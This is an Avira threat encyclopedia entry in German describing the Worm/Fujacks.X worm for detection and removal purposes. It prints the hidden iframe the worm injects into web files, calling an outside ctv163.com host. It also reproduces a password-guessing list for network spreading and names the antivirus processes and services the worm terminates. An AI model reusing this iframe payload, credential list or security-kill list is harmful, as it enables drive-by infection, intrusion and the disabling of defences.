Du brauchst Hilfe? Frage die Community oder wende dich an einen Experten.
Zu Avira Answers
Name:Worm/Fujacks.X
Entdeckt am:09/02/2007
Art:Worm
In freier Wildbahn:Ja
Gemeldete Infektionen:Niedrig
Verbreitungspotenzial:Mittel
Schadenspotenzial:Mittel
Statische Datei:Ja
Dateigre:118.272 Bytes
MD5 Prfsumme:9d0Ceb2ef643a2f326dfcd8265502ce9
IVDF Version:6.37.01.66 - Freitag, 9. Februar 2007

 General Verbreitungsmethode:
   • Lokales Netzwerk
   • Gemappte Netzlaufwerke


Aliases:
   •  Mcafee: W32/Fujacks.h
   •  Kaspersky: Worm.Win32.Fujack.a
   •  F-Secure: Worm.Win32.Fujack.a
   •  Sophos: W32/Fujacks-AJ
   •  Panda: W32/Radoppan.I.drp
   •  Grisoft: Worm/Generic.ANX
   •  Eset: Win32/Fujacks
   •  Bitdefender: Win32.Worm.Fujacks.X


Betriebsysteme:
   • Windows 95
   • Windows 98
   • Windows 98 SE
   • Windows NT
   • Windows ME
   • Windows 2000
   • Windows XP
   • Windows 2003


Auswirkungen:
   • Terminierung von Sicherheitsprogrammen
   • Ldt Dateien herunter
   • Erstellt Dateien
   • Setzt Sicherheitseinstellungen herunter
   • nderung an der Registry

 Dateien Kopien seiner selbst werden hier erzeugt:
   • %SYSDIR%\drivers\CTFMONT.exe
   • %Laufwerk%\setup.exe



Bereiche werden Dateien hinzugefgt.
– An: %alle Verzeichnisse%\*.htm Mit folgendem Inhalt:
   • iframe src="http://www.ctv163.com/**********/down.htm" width="0" height="0" frameborder="0" /iframe

– An: %alle Verzeichnisse%\*.html Mit folgendem Inhalt:
   • iframe src="http://www.ctv163.com/**********/down.htm" width="0" height="0" frameborder="0" /iframe

– An: %alle Verzeichnisse%\*.asp Mit folgendem Inhalt:
   • iframe src="http://www.ctv163.com/**********/down.htm" width="0" height="0" frameborder="0" /iframe

– An: %alle Verzeichnisse%\*.php Mit folgendem Inhalt:
   • iframe src="http://www.ctv163.com/**********/down.htm" width="0" height="0" frameborder="0" /iframe

– An: %alle Verzeichnisse%\*.jsp Mit folgendem Inhalt:
   • iframe src="http://www.ctv163.com/**********/down.htm" width="0" height="0" frameborder="0" /iframe

– An: %alle Verzeichnisse%\*.asp Mit folgendem Inhalt:
   • iframe src="http://www.ctv163.com/**********/down.htm" width="0" height="0" frameborder="0" /iframe




Es werden folgende Dateien erstellt:

Nicht virulente Datei:
   • %SYSDIR%\SVKP.sys

%alle Verzeichnisse%\Desktop_.ini Diese Datei ist eine nicht virulente Textdatei mit folgendem Inhalt:
   • %aktuelles Datum%

%Laufwerk%\autorun.inf Diese Datei ist eine nicht virulente Textdatei mit folgendem Inhalt:
   • %Programmcode, der Malware startet%




Es wird versucht folgende Datei herunterzuladen:

Die URL ist folgende:
   • http://www.ctv163.com/**********/down.txt
Diese Datei enthlt wahrscheinlich Download-Adressen welche als weitere Quelle fr neue Bedrohungen dienen knnen.

 Registry Der folgendeRegistryschlssel wird in einer Endlosschleife fortlaufen hinzugefgt um den Prozess nach einem Neustart des Systems erneut zu starten.

  [HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
   • svcshare = %SYSDIR%\drivers\CTMONTv.exe



Die Werte des folgenden Registry keys werden gelscht:

–  [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
   • RavTask
   • KvMonXP
   • kav
   • KAVPersonal50
   • McAfeeUpdaterUI
   • Network Associates Error Reporting Service
   • ShStatEXE
   • YLive.exe
   • yassistse



Folgender Registryschlssel wird gendert:

Verschiedenste Einstellungen des Explorers:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\
   Folder\Hidden\SHOWALL]
   Alter Wert:
   • CheckedValue = %Einstellungen des Benutzers%
   Neuer Wert:
   • CheckedValue = 0

 Infektion ber das Netzwerk Um die weitere Verbreitung sicherzustellen versucht sich die Malware mit anderen Computern zu verbinden. Die Einzelheiten hierzu sind im Folgenden beschrieben.


Um sich Zugriff auf entfernte Computer zu verschaffen werden folgende Anmeldeinformationen genutzt:

Folgende Liste von Benutzernamen:
   • Administrator
   • Guest
   • admin
   • Root

Folgende Liste von Passwrtern:
   • 1234; password; 6969; harley; 123456; golf; pussy; mustang; 1111;
      shadow; 1313; fish; 5150; 7777; qwerty; baseball; 2112; letmein;
      12345678; 12345; ccc; admin; 5201314; qq520; 123; 1234567; 123456789;
      654321; 54321; 111; 000000; abc; 11111111; 88888888; pass; passwd;
      database; abcd; abc123; sybase; 123qwe; server; computer; 520; super;
      123asd; ihavenopass; godblessyou; enable; 2002; 2003; 2600; alpha;
      110; 111111; 121212; 123123; 1234qwer; 123abc; 007; aaa; patrick; pat;
      administrator; root; sex; god; fuckyou; fuck; test; test123; temp;
      temp123; win; asdf; pwd; qwer; yxcv; zxcv; home; xxx; owner; login;
      Login; pw123; love; mypc; mypc123; admin123; mypass; mypass123; 901100



IP Adressen Erzeugung:
Es werden zufllige IP Adressen generiert wobei die ersten drei Zahlen die der eigenen Addresse sind. Es wird dann versuche eine Verbindung mit diesen Adressen aufzubauen.


Ablauf der Infektion:
Die heruntergeladene Datei wird auf dem enternten computer wie folgt gespeichert: %alle freigegebenen Verzeichnisse%\GameSetup.exe


Reduzierung der Geschwindigkeit:
Folgende Anzahl von Infektions-Instanzen wird erzeugt: 10
In Abhngigkeit von Ihrer Bandbreite ist es mglich, dass Sie einen Einbruch der Geschwindigkeit Ihres Netzwerks feststellen. Da die Netzwerkaktivitt fr diese Malware mittelmig ist, besteht auch die Mglichkeit, dass Sie dieses Symptom nicht bemerken, wenn Sie ber eine Breitbandanschlu verfgen.
Es ist mglich, dass der Computer ein wenig an Geschwindigkeit ein bt. Der Grund hierfr sind vielfachen Netzwer-Instanzen.

 Prozess Beendigung Liste der Prozesse die beendet werden:
   • Mcshield.exe; VsTskMgr.exe; naPrdMgr.exe; UpdaterUI.exe; TBMon.exe;
      scan32.exe; Ravmond.exe; CCenter.exe; RavTask.exe; Rav.exe;
      Ravmon.exe; RavmonD.exe; RavStub.exe; KVXP.kxp; KvMonXP.kxp;
      KVCenter.kxp; KVSrvXP.exe; KRegEx.exe; UIHost.exe; TrojDie.kxp;
      FrogAgent.exe; Logo1_.exe; Logo_1.exe; Rundl132.exe

Prozesse mit einem der folgenden Fensternamen werden beendet:
   • Symantec AntiVirus
   • Duba
   • Windows
   • esteem procs
   • System Safety Monitor
   • Wrapped gift Killer
   • Winsock Expert


Liste der Dienste die beendet werden:
   • sharedaccess; RsCCenter; RsRavMon; RsCCenter; RsRavMon; KVWSC;
      KVSrvXP; KVWSC; KVSrvXP; AVP; kavsvc; McAfeeFramework; McShield;
      McTaskManager; McAfeeFramework; McShield; McTaskManager; navapsvc;
      wscsvc; KPfwSvc; SNDSrvc; ccProxy; ccEvtMgr; ccSetMgr; SPBBCSvc;
      Symantec Core LC; NPFMntor; MskService; FireSvc

 Diverses Anti Debugging
Es wird berprft ob eine der folgenden Dateien vorhanden ist:
   • \\.\TRW
   • \\.\SICE
   • \\.\NTICE
   • \\.\FILEVXD
   • \\.\FILEMON
   • \\.\REGVXD
   • \\.\REGMON

War dies erfolgreich wird folgendes angezeigt und danach sofort beendet:


 Datei Einzelheiten Programmiersprache:
Das Malware-Programm wurde in Delphi geschrieben.


Laufzeitpacker:
Um eine Erkennung zu erschweren und die Gre der Datei zu reduzieren wurde sie mit folgendem Laufzeitpacker gepackt:
   • SVKP

Die Beschreibung wurde erstellt von Andrei Gherman am Donnerstag, 18. Oktober 2007
Die Beschreibung wurde geändert von Andrei Gherman am Donnerstag, 18. Oktober 2007

zurück . . . .